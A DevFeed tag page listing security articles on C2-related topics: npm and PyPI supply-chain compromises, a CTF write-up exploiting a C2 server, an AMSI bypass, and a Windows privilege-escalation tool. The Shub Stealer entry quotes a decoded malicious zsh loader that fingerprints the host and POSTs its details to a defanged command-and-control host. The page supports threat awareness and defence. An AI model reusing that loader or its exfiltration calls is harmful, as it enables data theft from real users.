DevFeed: [Mini Shai-Hulud Hits AntV: 300+ Malicious npm Packages Published via Compromised Maintainer Account](<https://devfeed.tech/articles/mini-shai-hulud-hits-antv-300-malicious-npm-packages-published-via-compromised-maintainer-account-8015.md>)

Original publisher: [Read original article](<https://snyk.io/blog/mini-shai-hulud-antv-npm-supply-chain-attack/>)

Author: Liran Tal

Published: 2026-05-18T23:00:00Z

Content type: article

Language: en

Sources: [Blog RSS Feed | Snyk](<https://devfeed.tech/sources/blog-rss-feed-snyk.md>)

Topics: [Data visualization](<https://devfeed.tech/topics/data-visualization.md>), [npm packages](<https://devfeed.tech/topics/npm-packages.md>), [Malware](<https://devfeed.tech/topics/malware.md>), [npm](<https://devfeed.tech/topics/npm.md>), [C2](<https://devfeed.tech/topics/c2.md>), [Bun](<https://devfeed.tech/topics/bun.md>), [JavaScript](<https://devfeed.tech/topics/javascript.md>), [GitHub](<https://devfeed.tech/topics/github.md>)

Tags: [awareness](<https://devfeed.tech/tags/awareness.md>), [blog](<https://devfeed.tech/tags/blog.md>), [c2](<https://devfeed.tech/tags/c2.md>), [data-visualization](<https://devfeed.tech/tags/data-visualization.md>), [developer](<https://devfeed.tech/tags/developer.md>), [devops](<https://devfeed.tech/tags/devops.md>), [devrel](<https://devfeed.tech/tags/devrel.md>), [javascript](<https://devfeed.tech/tags/javascript.md>), [malware](<https://devfeed.tech/tags/malware.md>), [npm-packages](<https://devfeed.tech/tags/npm-packages.md>), [payload](<https://devfeed.tech/tags/payload.md>), [secrets](<https://devfeed.tech/tags/secrets.md>), [security](<https://devfeed.tech/tags/security.md>), [snyk-open-source](<https://devfeed.tech/tags/snyk-open-source.md>), [snyk-platform](<https://devfeed.tech/tags/snyk-platform.md>), [supply-chain](<https://devfeed.tech/tags/supply-chain.md>), [supply-chain-security](<https://devfeed.tech/tags/supply-chain-security.md>), [teampcp](<https://devfeed.tech/tags/teampcp.md>), [tokens](<https://devfeed.tech/tags/tokens.md>)

### AI overview

This article analyzes the Mini Shai-Hulud supply-chain attack targeting the AntV data visualization ecosystem through a compromised npm maintainer account. It describes the mass publication of malicious package versions, the embedded Bun payload, credential and secret theft, C2 persistence, and self-propagation using stolen npm tokens.

### Source excerpt

A compromised npm maintainer account triggered an automated burst of over 300 malicious package versions across 323 packages in the AntV data visualization ecosystem, part of the ongoing Mini Shai-Hulud supply chain worm campaign. Here's what the malware does, how to detect exposure, and how to respond.

## Shai-Hulud Goes Open Source

DevFeed: [Shai-Hulud Goes Open Source](<https://devfeed.tech/articles/shai-hulud-goes-open-source-8298.md>)

Original publisher: [Read original article](<https://securitylabs.datadoghq.com/articles/shai-hulud-open-source-framework-static-analysis/>)

Author: Ryan Simon, Sebastian Obregoso, Greg Foss

Published: 2026-05-13T00:00:00Z

Content type: article

Language: en

Sources: [Datadog Security Labs](<https://devfeed.tech/sources/datadog-security-labs.md>)

Topics: [Open Source](<https://devfeed.tech/topics/open-source.md>), [Code](<https://devfeed.tech/topics/code.md>), [TypeScript](<https://devfeed.tech/topics/typescript.md>), [Bun](<https://devfeed.tech/topics/bun.md>), [JavaScript](<https://devfeed.tech/topics/javascript.md>), [CI/CD](<https://devfeed.tech/topics/cicd.md>), [Cloud](<https://devfeed.tech/topics/cloud.md>), [Persistence](<https://devfeed.tech/topics/persistence.md>), [Linux](<https://devfeed.tech/topics/linux.md>), [macOS](<https://devfeed.tech/topics/macos.md>), [AI Agent](<https://devfeed.tech/topics/ai-agent.md>), [ssh](<https://devfeed.tech/topics/ssh.md>)

Tags: [analysis](<https://devfeed.tech/tags/analysis.md>), [attacks](<https://devfeed.tech/tags/attacks.md>), [c2](<https://devfeed.tech/tags/c2.md>), [ci-cd](<https://devfeed.tech/tags/ci-cd.md>), [cloud](<https://devfeed.tech/tags/cloud.md>), [code](<https://devfeed.tech/tags/code.md>), [framework](<https://devfeed.tech/tags/framework.md>), [github](<https://devfeed.tech/tags/github.md>), [javascript](<https://devfeed.tech/tags/javascript.md>), [kubernetes](<https://devfeed.tech/tags/kubernetes.md>), [linux](<https://devfeed.tech/tags/linux.md>), [macos](<https://devfeed.tech/tags/macos.md>), [open-source](<https://devfeed.tech/tags/open-source.md>), [persistence](<https://devfeed.tech/tags/persistence.md>), [ssh](<https://devfeed.tech/tags/ssh.md>), [supply-chain](<https://devfeed.tech/tags/supply-chain.md>), [teampcp](<https://devfeed.tech/tags/teampcp.md>), [typescript](<https://devfeed.tech/tags/typescript.md>)

### AI overview

A static analysis of the Shai-Hulud offensive framework attributed to TeamPCP. The article examines its TypeScript/Bun architecture, credential harvesting, supply-chain poisoning, CI/CD targeting, persistence, and encrypted data exfiltration.

### Source excerpt

A static analysis of the open-sourced Shai-Hulud offensive framework attributed to TeamPCP, covering its credential harvesting, supply chain poisoning, and exfiltration capabilities.

## Shub Stealers Fake Crypto Apps

DevFeed: [Shub Stealers Fake Crypto Apps](<https://devfeed.tech/articles/shub-stealers-fake-crypto-apps-22545.md>)

Original publisher: [Read original article](<https://medium.com/walmartglobaltech/shub-stealers-fake-crypto-apps-d5e2a65618b7?source=rss----905ea2b3d4d1---4>)

Author: Jason Reaves

Published: 2026-04-06T17:34:44Z

Content type: article

Language: en

Sources: [Walmart Global Tech](<https://devfeed.tech/sources/walmart-global-tech.md>)

Topics: [Security](<https://devfeed.tech/topics/security.md>), [C2](<https://devfeed.tech/topics/c2.md>), [Bash](<https://devfeed.tech/topics/bash.md>), [Zsh](<https://devfeed.tech/topics/zsh.md>), [payload](<https://devfeed.tech/topics/payload.md>), [telemetry](<https://devfeed.tech/topics/telemetry.md>), [API](<https://devfeed.tech/topics/api.md>), [JSON](<https://devfeed.tech/topics/json.md>)

Tags: [c2](<https://devfeed.tech/tags/c2.md>), [code](<https://devfeed.tech/tags/code.md>), [infosec](<https://devfeed.tech/tags/infosec.md>), [json](<https://devfeed.tech/tags/json.md>), [macos](<https://devfeed.tech/tags/macos.md>), [malware](<https://devfeed.tech/tags/malware.md>), [payload](<https://devfeed.tech/tags/payload.md>), [reverse-engineering](<https://devfeed.tech/tags/reverse-engineering.md>), [security](<https://devfeed.tech/tags/security.md>), [shell](<https://devfeed.tech/tags/shell.md>), [shell-script](<https://devfeed.tech/tags/shell-script.md>), [telemetry](<https://devfeed.tech/tags/telemetry.md>), [zsh](<https://devfeed.tech/tags/zsh.md>)

### AI overview

Jason Reaves examines Shub Stealer's fake cryptocurrency applications. The article describes shell-script checks that collect system and locale information, send telemetry, and block execution in certain environments, then explains how counterfeit Exodus, Atomic, Ledger, LedgerLive, and Trezor apps capture wallet credentials or recovery phrases and send the data to command-and-control infrastructure.

### Source excerpt

By: Jason Reaves Shub Stealer[1] which looks very similar to MacSync also leveraged the same obfuscator on their shellscript[2] that is very popular lately. Shell script: fd674425d3fc0d95bbc90dcd598eabdb2ddd77037954c8a1d1175f118d1e8ddd After decoding however it is a bit different as it includes a number of checks: #!/bin/zsh # Debug loader -- detect CIS and block with telemetry IS_CIS="false" if defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources 2>/dev/null | grep -qi russian; then IS_CIS="true" fi # Detect locale info -- sanitize for JSON LOCALE_INFO=$(defaults read ~/Library/Preferences/com.apple.HIToolbox.plist AppleEnabledInputSources 2>/dev/null | grep -i "KeyboardLayout Name" | head -5 | tr '\n' ',' | tr -d '"' | tr -d "'" || echo "unknown") HOSTNAME=$(hostname 2>/dev/null | tr -d '"' || echo "unknown") OS_VER=$(sw_vers -productVersion 2>/dev/null || echo "unknown") EXT_IP=$(curl -s --max-time 5 https://api.ipify.org 2>/dev/null || curl -s --max-time 5 hxxps://icanhazip.com 2>/dev/null || curl -s --max-time hxxps://ifconfig[.]me 2>/dev/null || echo "unknown") EXT_IP=$(echo "$EXT_IP" | tr -d ' ') # Build JSON safely using printf send_debug_event() { local EVT="$1" local JSON=$(printf '{"event":"%s","build_hash":"%s","ip":"%s","is_cis":"%s","locale":"%s","hostname":"%s","os_version":"%s"}' "$EVT" "" "$EXT_IP" "$IS_CIS" "$LOCALE_INFO" "$HOSTNAME" "$OS_VER") curl -s -X POST "hxxps://coco2-hram[.]com/api/debug/event" -H "Content-Type: application/json" -d "$JSON" --max-time 5 >/dev/null 2>&1 } # If CIS -- send cis_blocked event and exit if [ "$IS_CIS" = "true" ]; then send_debug_event "cis_blocked" >/dev/null 2>&1 exit 0 fi # Not CIS -- send loader_requested event send_debug_event "loader_requested" >/dev/null 2>&1 & daemon_function() { exec </dev/null exec >/dev/null exec 2>/dev/null curl -k -s --max-time 30 -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Sa

## Malicious axios versions published to npm: Chainguard customers protected

DevFeed: [Malicious axios versions published to npm: Chainguard customers protected](<https://devfeed.tech/articles/malicious-axios-versions-published-to-npm-chainguard-customers-protected-13145.md>)

Original publisher: [Read original article](<https://www.chainguard.dev/unchained/malicious-axios-versions-published-to-npm-chainguard-customers-protected>)

Published: 2026-03-31T00:00:00Z

Content type: article

Language: en

Sources: [Chainguard: Unchained](<https://devfeed.tech/sources/chainguard-unchained.md>)

Topics: [axios](<https://devfeed.tech/topics/axios.md>), [npm](<https://devfeed.tech/topics/npm.md>), [Remote Access Trojan](<https://devfeed.tech/topics/remote-access-trojan.md>), [Open Source](<https://devfeed.tech/topics/open-source.md>), [JavaScript](<https://devfeed.tech/topics/javascript.md>), [payload](<https://devfeed.tech/topics/payload.md>), [Single-page application (SPA)](<https://devfeed.tech/topics/spa.md>), [Filesystems](<https://devfeed.tech/topics/filesystems.md>), [HTTP](<https://devfeed.tech/topics/http.md>), [Script](<https://devfeed.tech/topics/script.md>), [Linux](<https://devfeed.tech/topics/linux.md>), [macOS](<https://devfeed.tech/topics/macos.md>)

Tags: [axios](<https://devfeed.tech/tags/axios.md>), [axios-attack](<https://devfeed.tech/tags/axios-attack.md>), [axios-npm-attack](<https://devfeed.tech/tags/axios-npm-attack.md>), [axios-supply-chain-attack](<https://devfeed.tech/tags/axios-supply-chain-attack.md>), [c2](<https://devfeed.tech/tags/c2.md>), [chainguard-actions](<https://devfeed.tech/tags/chainguard-actions.md>), [chainguard-axios](<https://devfeed.tech/tags/chainguard-axios.md>), [chainguard-libraries](<https://devfeed.tech/tags/chainguard-libraries.md>), [chainguard-npm-libraries](<https://devfeed.tech/tags/chainguard-npm-libraries.md>), [dependency](<https://devfeed.tech/tags/dependency.md>), [files](<https://devfeed.tech/tags/files.md>), [http](<https://devfeed.tech/tags/http.md>), [javascript](<https://devfeed.tech/tags/javascript.md>), [linux](<https://devfeed.tech/tags/linux.md>), [macos](<https://devfeed.tech/tags/macos.md>), [npm](<https://devfeed.tech/tags/npm.md>), [npm-packages](<https://devfeed.tech/tags/npm-packages.md>), [payload](<https://devfeed.tech/tags/payload.md>), [remote-access-trojan](<https://devfeed.tech/tags/remote-access-trojan.md>), [script](<https://devfeed.tech/tags/script.md>), [supply-chain-attacks](<https://devfeed.tech/tags/supply-chain-attacks.md>), [windows](<https://devfeed.tech/tags/windows.md>)

### AI overview

The article reports that two malicious axios versions were published to npm with a hidden dependency that deployed a cross-platform remote access trojan on macOS, Windows, and Linux. It explains the compromised maintainer account, post-install execution, command-and-control communication, payload delivery, and recommended auditing and remediation steps. Chainguard customers were protected by package-blocking and source-verification controls.

### Source excerpt

Malicious axios versions on npm delivered a RAT via a hidden dependency. Chainguard customers were protected by blocking unsafe packages and verifying source.

## Axios npm Package Compromised: Supply Chain Attack Delivers Cross-Platform RAT

DevFeed: [Axios npm Package Compromised: Supply Chain Attack Delivers Cross-Platform RAT](<https://devfeed.tech/articles/axios-npm-package-compromised-supply-chain-attack-delivers-cross-platform-rat-7839.md>)

Original publisher: [Read original article](<https://snyk.io/blog/axios-npm-package-compromised-supply-chain-attack-delivers-cross-platform/>)

Author: Liran Tal

Published: 2026-03-30T23:00:00Z

Content type: article

Language: en

Sources: [Blog RSS Feed | Snyk](<https://devfeed.tech/sources/blog-rss-feed-snyk.md>)

Topics: [npm](<https://devfeed.tech/topics/npm.md>), [StreamRAT](<https://devfeed.tech/topics/streamrat.md>), [cross-platform](<https://devfeed.tech/topics/cross-platform.md>), [JavaScript](<https://devfeed.tech/topics/javascript.md>), [CI/CD](<https://devfeed.tech/topics/cicd.md>), [ide](<https://devfeed.tech/topics/ide.md>), [client](<https://devfeed.tech/topics/client.md>), [GitHub](<https://devfeed.tech/topics/github.md>)

Tags: [analysis](<https://devfeed.tech/tags/analysis.md>), [awareness](<https://devfeed.tech/tags/awareness.md>), [blog](<https://devfeed.tech/tags/blog.md>), [c2](<https://devfeed.tech/tags/c2.md>), [ci](<https://devfeed.tech/tags/ci.md>), [ci-cd](<https://devfeed.tech/tags/ci-cd.md>), [code](<https://devfeed.tech/tags/code.md>), [developer](<https://devfeed.tech/tags/developer.md>), [devrel](<https://devfeed.tech/tags/devrel.md>), [github](<https://devfeed.tech/tags/github.md>), [javascript](<https://devfeed.tech/tags/javascript.md>), [macos](<https://devfeed.tech/tags/macos.md>), [malware](<https://devfeed.tech/tags/malware.md>), [obfuscation](<https://devfeed.tech/tags/obfuscation.md>), [payload](<https://devfeed.tech/tags/payload.md>), [remote-access-trojan](<https://devfeed.tech/tags/remote-access-trojan.md>), [security](<https://devfeed.tech/tags/security.md>), [server](<https://devfeed.tech/tags/server.md>), [snyk-open-source](<https://devfeed.tech/tags/snyk-open-source.md>), [snyk-platform](<https://devfeed.tech/tags/snyk-platform.md>), [supply-chain](<https://devfeed.tech/tags/supply-chain.md>), [supply-chain-security](<https://devfeed.tech/tags/supply-chain-security.md>)

### AI overview

The article analyzes a supply-chain attack in which malicious Axios versions published to npm through a compromised maintainer account introduced a hidden dependency. Installing the affected packages could trigger a postinstall dropper that downloaded a platform-specific remote access trojan, contacted a command-and-control server, and erased evidence after execution.

### Source excerpt

Meta description: Malicious versions of the Axios npm package (1.14.1 and 0.30.4) were published via a compromised maintainer account, injecting a hidden dependency that deploys a cross-platform remote access trojan. Here's what happened, who's affected, and how to check your exposure.

## How to protect your organization from the telnyx PyPI compromise

DevFeed: [How to protect your organization from the telnyx PyPI compromise](<https://devfeed.tech/articles/how-to-protect-your-organization-from-the-telnyx-pypi-compromise-13095.md>)

Original publisher: [Read original article](<https://www.chainguard.dev/unchained/how-to-protect-your-organization-from-the-telnyx-pypi-compromise>)

Published: 2026-03-27T00:00:00Z

Content type: article

Language: en

Sources: [Chainguard: Unchained](<https://devfeed.tech/sources/chainguard-unchained.md>)

Topics: [Malware](<https://devfeed.tech/topics/malware.md>), [open-source-security](<https://devfeed.tech/topics/open-source-security.md>), [SDKs](<https://devfeed.tech/topics/sdks.md>), [C2](<https://devfeed.tech/topics/c2.md>), [Python](<https://devfeed.tech/topics/python.md>), [API keys](<https://devfeed.tech/topics/api-keys.md>), [Encryption](<https://devfeed.tech/topics/encryption.md>), [Open Source](<https://devfeed.tech/topics/open-source.md>), [chainguard](<https://devfeed.tech/topics/chainguard.md>), [ssh](<https://devfeed.tech/topics/ssh.md>), [GitHub Actions](<https://devfeed.tech/topics/github-actions.md>)

Tags: [api-keys](<https://devfeed.tech/tags/api-keys.md>), [c2](<https://devfeed.tech/tags/c2.md>), [chainguard](<https://devfeed.tech/tags/chainguard.md>), [chainguard-libraries](<https://devfeed.tech/tags/chainguard-libraries.md>), [encryption](<https://devfeed.tech/tags/encryption.md>), [github-actions](<https://devfeed.tech/tags/github-actions.md>), [malware](<https://devfeed.tech/tags/malware.md>), [open-source-security](<https://devfeed.tech/tags/open-source-security.md>), [pypi](<https://devfeed.tech/tags/pypi.md>), [pypi-attack](<https://devfeed.tech/tags/pypi-attack.md>), [pypi-compromise](<https://devfeed.tech/tags/pypi-compromise.md>), [rsa](<https://devfeed.tech/tags/rsa.md>), [security](<https://devfeed.tech/tags/security.md>), [ssh](<https://devfeed.tech/tags/ssh.md>), [supply-chain](<https://devfeed.tech/tags/supply-chain.md>), [teampcp](<https://devfeed.tech/tags/teampcp.md>), [telnyx](<https://devfeed.tech/tags/telnyx.md>), [telnyx-attack](<https://devfeed.tech/tags/telnyx-attack.md>), [telnyx-compromise](<https://devfeed.tech/tags/telnyx-compromise.md>), [trivy](<https://devfeed.tech/tags/trivy.md>)

### AI overview

The article explains that malicious versions 4.87.1 and 4.87.2 of the Telnyx Python SDK were published to PyPI after publishing credentials were compromised. The malware executes at module scope, downloads from a remote C2 server, and uses a WAV file to conceal a Windows persistence binary or credential harvester for Linux and macOS. It recommends immediate removal, version pinning, credential rotation, and persistence checks. The article also attributes the attack to TeamPCP and connects it to a broader coordinated supply chain campaign.

### Source excerpt

Malicious telnyx versions hit PyPI in a wider supply chain attack. Chainguard customers stayed protected by using source-built, verified libraries.

## Blog: Automate Kubernetes Network Security with Falco Talon

DevFeed: [Blog: Automate Kubernetes Network Security with Falco Talon](<https://devfeed.tech/articles/blog-automate-kubernetes-network-security-with-falco-talon-32499.md>)

Original publisher: [Read original article](<https://falco.org/blog/falco-network-security/>)

Published: 2024-02-09T00:00:00Z

Content type: article

Language: en

Sources: [Falco - Falco](<https://devfeed.tech/sources/falco-falco.md>), [Falco - The Falco blog](<https://devfeed.tech/sources/falco-the-falco-blog.md>)

Topics: [Kubernetes](<https://devfeed.tech/topics/kubernetes.md>), [Falco](<https://devfeed.tech/topics/falco.md>), [network security](<https://devfeed.tech/topics/network-security.md>), [threat detection](<https://devfeed.tech/topics/threat-detection.md>), [C2](<https://devfeed.tech/topics/c2.md>)

Tags: [c2](<https://devfeed.tech/tags/c2.md>), [falco](<https://devfeed.tech/tags/falco.md>), [kubernetes](<https://devfeed.tech/tags/kubernetes.md>), [network-security](<https://devfeed.tech/tags/network-security.md>), [security](<https://devfeed.tech/tags/security.md>), [security-concept](<https://devfeed.tech/tags/security-concept.md>), [threat-detection](<https://devfeed.tech/tags/threat-detection.md>)

### AI overview

This article explains how Falco Talon can automate Kubernetes network security by responding to detected threats and updating network policies. It describes the limitations of IP-based policies and proposes using labels to isolate suspicious network traffic at runtime.

### Source excerpt

Falco Talon Repository: https://github.com/Falco-Talon/falco-talon Falco Talon Documentation: https://falco-talon.github.io/ Falco Talon is currently under active development and remains in the alpha stage; therefore, breaking changes may occur at any time, and the documentation may not always be up to date. Setting up robust network security in Kubernetes is a challenge that demands both precision and adaptability. NetworkPolicy offers the potential for highly specific network configurations, enabling or blocking traffic based on a comprehensive set of criteria. However, the dynamic nature of network topologies and the complexities of managing policy implementations present ongoing challenges. The need for constant policy updates, especially in response to changing threat landscapes, introduces risks such as the potential for misconfiguration and the unintended dropping of packets. The Challenge of IP-Based Network Policies Building network policies around IP addresses is notoriously challenging. For instance, threat feeds, which list known malicious IP addresses, are constantly changing. An IP address associated with a malicious entity one week might be reassigned and deemed safe the next. This fluidity necessitates an agile approach to network policy management, integrating solutions like NetworkSets to dynamically update policies based on the latest intelligence. However, the sheer volume of threat intelligence feeds - from Tor IP lists to cryptomining blocklists - complicates this integration, making it a daunting task to maintain accurate network controls. Here, Falco Talon emerges as a transformative solution. By leveraging Falco's detection capabilities, such as identifying Outbound Connections to C2 Servers, Falco Talon can instantly update Kubernetes network policies to block all egress traffic except allowed CIDR ranges. This is facilitated through the kubernetes:networkpolicy Talon action, demonstrating a seamless integration of dynamic threat detection

## Snyk Fetch the Flag CTF 2023 writeup: Silent Cartographer

DevFeed: [Snyk Fetch the Flag CTF 2023 writeup: Silent Cartographer](<https://devfeed.tech/articles/snyk-fetch-the-flag-ctf-2023-writeup-silent-cartographer-8132.md>)

Original publisher: [Read original article](<https://snyk.io/blog/snyk-fetch-the-flag-ctf-2023-writeup-silent-cartographer/>)

Author: John Hammond

Published: 2023-11-30T06:00:00Z

Content type: article

Language: en

Sources: [Blog RSS Feed | Snyk](<https://devfeed.tech/sources/blog-rss-feed-snyk.md>)

Topics: [ctf](<https://devfeed.tech/topics/ctf.md>), [C2](<https://devfeed.tech/topics/c2.md>), [JSON Web Tokens](<https://devfeed.tech/topics/jwt.md>), [web applications](<https://devfeed.tech/topics/web-applications.md>), [Server](<https://devfeed.tech/topics/server.md>)

Tags: [apis](<https://devfeed.tech/tags/apis.md>), [awareness](<https://devfeed.tech/tags/awareness.md>), [blog](<https://devfeed.tech/tags/blog.md>), [c2](<https://devfeed.tech/tags/c2.md>), [code](<https://devfeed.tech/tags/code.md>), [ctf](<https://devfeed.tech/tags/ctf.md>), [developer](<https://devfeed.tech/tags/developer.md>), [exploits](<https://devfeed.tech/tags/exploits.md>), [external](<https://devfeed.tech/tags/external.md>), [security](<https://devfeed.tech/tags/security.md>), [server](<https://devfeed.tech/tags/server.md>), [web](<https://devfeed.tech/tags/web.md>), [web-app](<https://devfeed.tech/tags/web-app.md>)

### AI overview

This Snyk writeup explains the solution to the Silent Cartographer challenge from the 2023 Fetch the Flag CTF. The challenge involves exploiting Covenant, a C2 web application, by forging a JWT with a default secret key, obtaining administrative access, modifying the exploit to use an available port, and handling the resulting reverse shell through a tunneling service.

### Source excerpt

If you were at Snyk's 2023 Fetch the Flag and are looking for the answer to the Silent Cartographer challenge, you've come to the right place. Let's walk through the solution together!

## In-Process Patchless AMSI Bypass

DevFeed: [In-Process Patchless AMSI Bypass](<https://devfeed.tech/articles/in-process-patchless-amsi-bypass-32633.md>)

Original publisher: [Read original article](<https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/>)

Author: CCob

Published: 2022-04-17T16:30:25Z

Content type: tutorial

Language: en

Sources: [Ethical Chaos](<https://devfeed.tech/sources/ethical-chaos.md>)

Topics: [Windows](<https://devfeed.tech/topics/windows.md>), [Exception](<https://devfeed.tech/topics/exception.md>), [exceptions](<https://devfeed.tech/topics/exceptions.md>), [debug](<https://devfeed.tech/topics/debug.md>), [C2](<https://devfeed.tech/topics/c2.md>), [Processes](<https://devfeed.tech/topics/processes.md>)

Tags: [article](<https://devfeed.tech/tags/article.md>), [breakpoint](<https://devfeed.tech/tags/breakpoint.md>), [bypass](<https://devfeed.tech/tags/bypass.md>), [c2](<https://devfeed.tech/tags/c2.md>), [context](<https://devfeed.tech/tags/context.md>), [debugger](<https://devfeed.tech/tags/debugger.md>), [edr](<https://devfeed.tech/tags/edr.md>), [exception](<https://devfeed.tech/tags/exception.md>), [exception-handling](<https://devfeed.tech/tags/exception-handling.md>), [execution](<https://devfeed.tech/tags/execution.md>), [extension](<https://devfeed.tech/tags/extension.md>), [windows](<https://devfeed.tech/tags/windows.md>)

### AI overview

This article explains an in-process, patchless AMSI bypass approach using vectored exception handling. It contrasts this technique with SharpBlock's debugger-based child-process method and describes manipulating thread context at the point an exception occurs.

### Source excerpt

Some of you may remember my patchless AMSI bypass article and how it was used inside SharpBlock to bypass AMSI on the child process that SharpBlock spawns. This is all well a good when up against client environments that are not too sensitive to the fork and run post exploitation model of operating. What about [...] The post In-Process Patchless AMSI Bypass appeared first on Ethical Chaos.

## Merging C# Assemblies using dnMerge

DevFeed: [Merging C# Assemblies using dnMerge](<https://devfeed.tech/articles/merging-c-assemblies-using-dnmerge-32632.md>)

Original publisher: [Read original article](<https://ethicalchaos.dev/2021/07/04/merging-c-assemblies-using-dnmerge/>)

Author: CCob

Published: 2021-07-04T08:32:55Z

Content type: tutorial

Language: en

Sources: [Ethical Chaos](<https://devfeed.tech/sources/ethical-chaos.md>)

Topics: [C#](<https://devfeed.tech/topics/csharp.md>), [Linux](<https://devfeed.tech/topics/linux.md>), [.NET](<https://devfeed.tech/topics/net.md>), [C2](<https://devfeed.tech/topics/c2.md>), [Compression](<https://devfeed.tech/topics/compression.md>), [Deployment](<https://devfeed.tech/topics/deployment.md>)

Tags: [assembly](<https://devfeed.tech/tags/assembly.md>), [c-sharp](<https://devfeed.tech/tags/c-sharp.md>), [c2](<https://devfeed.tech/tags/c2.md>), [cobalt-strike](<https://devfeed.tech/tags/cobalt-strike.md>), [compression](<https://devfeed.tech/tags/compression.md>), [costura](<https://devfeed.tech/tags/costura.md>), [deployment](<https://devfeed.tech/tags/deployment.md>), [dnmerge](<https://devfeed.tech/tags/dnmerge.md>), [linux](<https://devfeed.tech/tags/linux.md>), [merge](<https://devfeed.tech/tags/merge.md>), [net](<https://devfeed.tech/tags/net.md>), [tooling](<https://devfeed.tech/tags/tooling.md>)

### AI overview

This developer article explains why Costura can introduce .NET Core assembly references when merging C# assemblies during Linux-based cross-compilation. It introduces dnMerge, an MSBuild plugin that merges and compresses reference assemblies while retaining Linux cross-compilation support, and describes its use of LZMA compression.

### Source excerpt

Introduction When it comes to automating builds for any project that I undertake, my goto OS is usually Linux. Generally I find the deployment of build nodes easier to deploy and manage and usually cheaper than their Windows counterparts. The problem with this of course is Windows based software generally needs cross-compiling in someway or [...] The post Merging C# Assemblies using dnMerge appeared first on Ethical Chaos.

## SweetPotato - Local Service to SYSTEM

DevFeed: [SweetPotato - Local Service to SYSTEM](<https://devfeed.tech/articles/sweetpotato-local-service-to-system-32628.md>)

Original publisher: [Read original article](<https://ethicalchaos.dev/2020/04/13/sweetpotato-local-service-to-system-privesc/>)

Author: CCob

Published: 2020-04-13T17:30:53Z

Content type: article

Language: en

Sources: [Ethical Chaos](<https://devfeed.tech/sources/ethical-chaos.md>)

Topics: [Exploit](<https://devfeed.tech/topics/exploit.md>), [Windows](<https://devfeed.tech/topics/windows.md>), [.NET](<https://devfeed.tech/topics/net.md>), [Security](<https://devfeed.tech/topics/security.md>), [C2](<https://devfeed.tech/topics/c2.md>)

Tags: [c-sharp](<https://devfeed.tech/tags/c-sharp.md>), [c2](<https://devfeed.tech/tags/c2.md>), [cobalt-strike](<https://devfeed.tech/tags/cobalt-strike.md>), [dcom](<https://devfeed.tech/tags/dcom.md>), [exploit](<https://devfeed.tech/tags/exploit.md>), [juicypotato](<https://devfeed.tech/tags/juicypotato.md>), [privesc](<https://devfeed.tech/tags/privesc.md>), [rottenpotato](<https://devfeed.tech/tags/rottenpotato.md>), [sweetpotato](<https://devfeed.tech/tags/sweetpotato.md>), [weaponize](<https://devfeed.tech/tags/weaponize.md>), [windows](<https://devfeed.tech/tags/windows.md>), [winrm](<https://devfeed.tech/tags/winrm.md>)

### AI overview

This article introduces SweetPotato, a C# rewrite of JuicyPotato that performs local service-account to SYSTEM privilege escalation on Windows. It adds a BITS/WinRM-based technique and can automatically select between exploit methods depending on the Windows version.

### Source excerpt

Upgraded JuicyPotato performing Local Service to SYSTEM privilege escalation on Windows 7 to the latest Windows 10 / Server 2019. The post SweetPotato - Local Service to SYSTEM appeared first on Ethical Chaos.

[Next page](<https://devfeed.tech/tags/c2.md?cursor=WyIyMDIwLTA0LTEzVDE3OjMwOjUzKzAwOjAwIiwgIjljZTk3ZjhlLTM0YTgtNGEzNi04MmE0LTlhNTNlYzNmNDYwZCJd>)